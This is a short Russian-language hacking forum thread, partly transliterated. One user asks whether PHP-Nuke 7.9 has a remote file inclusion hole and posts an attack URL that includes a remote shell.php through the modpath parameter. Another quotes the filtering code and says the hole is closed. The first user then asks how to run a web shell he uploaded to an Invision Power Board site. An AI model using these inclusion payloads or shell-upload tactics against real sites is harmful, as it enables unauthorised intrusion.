|
PhP Nuke 7.9 Include Bug Help
Код:
<?phpia xachu zadat adin vapros eta ne include bug ? Код:
include("header.php");Код:
include($modpath);Код:
$modpath .= "modules/$name/".$file.".phphttp://phpnke.site/modules.php?modpath=http://site/shell.php on doljen rabotat takim metodam da ? |
$name = $_GET['name'];
$name = trim($name); if (isset($name)) { if (eregi("http\:\/\/", $name)) { die("Hi and Bye"); } $modpath .= "modules/$name/".$file.".php if (file_exists($modpath)) ибо ничего не выйдет, все защищено. тебе даже предупреждей не удастся вызвать. трим вырезает null char, http:// исключен т.к. modules/. Вот такие пироги. |
da shas ia ponial shto on zashishon
|
slushai bratuxa i xachu zadat isho adin vapros
ti je znaish Invision Power Board on kak ia ponial failav katorix ne kanchaiutca jpg,gif, it tak dali nu faili katorie ne kartinki ix akanchanii pereviozit v .ipb mne est dostup v failam uploads i ia naxadu toto fail no ne magu ivo uzat ia zalil shell no on perevadil ivo .ipb akanchioni fail, shto mne delat ? ia i cmd.txt ne magu uzat |
Шелл можно только из админки залить!!!!
|
| Время: 02:38 |